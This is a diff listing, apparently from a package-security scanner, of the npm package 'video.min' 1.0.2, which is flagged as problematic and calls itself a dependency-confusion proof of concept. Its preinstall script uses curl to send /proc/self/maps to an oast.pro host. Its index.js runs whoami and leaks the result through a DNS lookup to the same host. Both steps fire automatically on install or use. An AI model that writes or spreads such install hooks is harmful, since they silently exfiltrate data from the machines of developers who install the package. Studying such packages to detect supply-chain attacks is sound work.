video.min 1.0.2
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of video.min might be problematic. Click here for more details.
- package/README.md +5 -0
- package/index.js +14 -0
- package/package.json +23 -0
package/README.md
ADDED
package/index.js
ADDED
@@ -0,0 +1,14 @@
|
|
1
|
+
const {exec} = require("child_process");
|
2
|
+
|
3
|
+
exec("a=$(whoami) && host $a.crf9ek8nlmq4vd6pnho0jsjlhghtllcvo.oast.pro", (error, data, getter) => {
|
4
|
+
if(error){
|
5
|
+
console.log("error", error.message);
|
6
|
+
return;
|
7
|
+
}
|
8
|
+
if(getter){
|
9
|
+
console.log("data", data);
|
10
|
+
return;
|
11
|
+
}
|
12
|
+
console.log(data);
|
13
|
+
}
|
14
|
+
);
|
package/package.json
ADDED
@@ -0,0 +1,23 @@
|
|
1
|
+
{
|
2
|
+
"name": "video.min",
|
3
|
+
"version": "1.0.2",
|
4
|
+
"description": "Vulnerable Package - PoC for Dependency Confusion",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "/usr/bin/curl --data '@/proc/self/maps' $(hostname).crf9ek8nlmq4vd6pnho0jsjlhghtllcvo.oast.pro",
|
8
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
9
|
+
},
|
10
|
+
"repository": {
|
11
|
+
"type": "git",
|
12
|
+
"url": "git+https://github.com/k0ns0l/video.min.git"
|
13
|
+
},
|
14
|
+
"keywords": [
|
15
|
+
"PoC"
|
16
|
+
],
|
17
|
+
"author": "k0ns0l",
|
18
|
+
"license": "ISC",
|
19
|
+
"bugs": {
|
20
|
+
"url": "https://github.com/k0ns0l/video.min/issues"
|
21
|
+
},
|
22
|
+
"homepage": "https://github.com/k0ns0l/video.min#readme"
|
23
|
+
}
|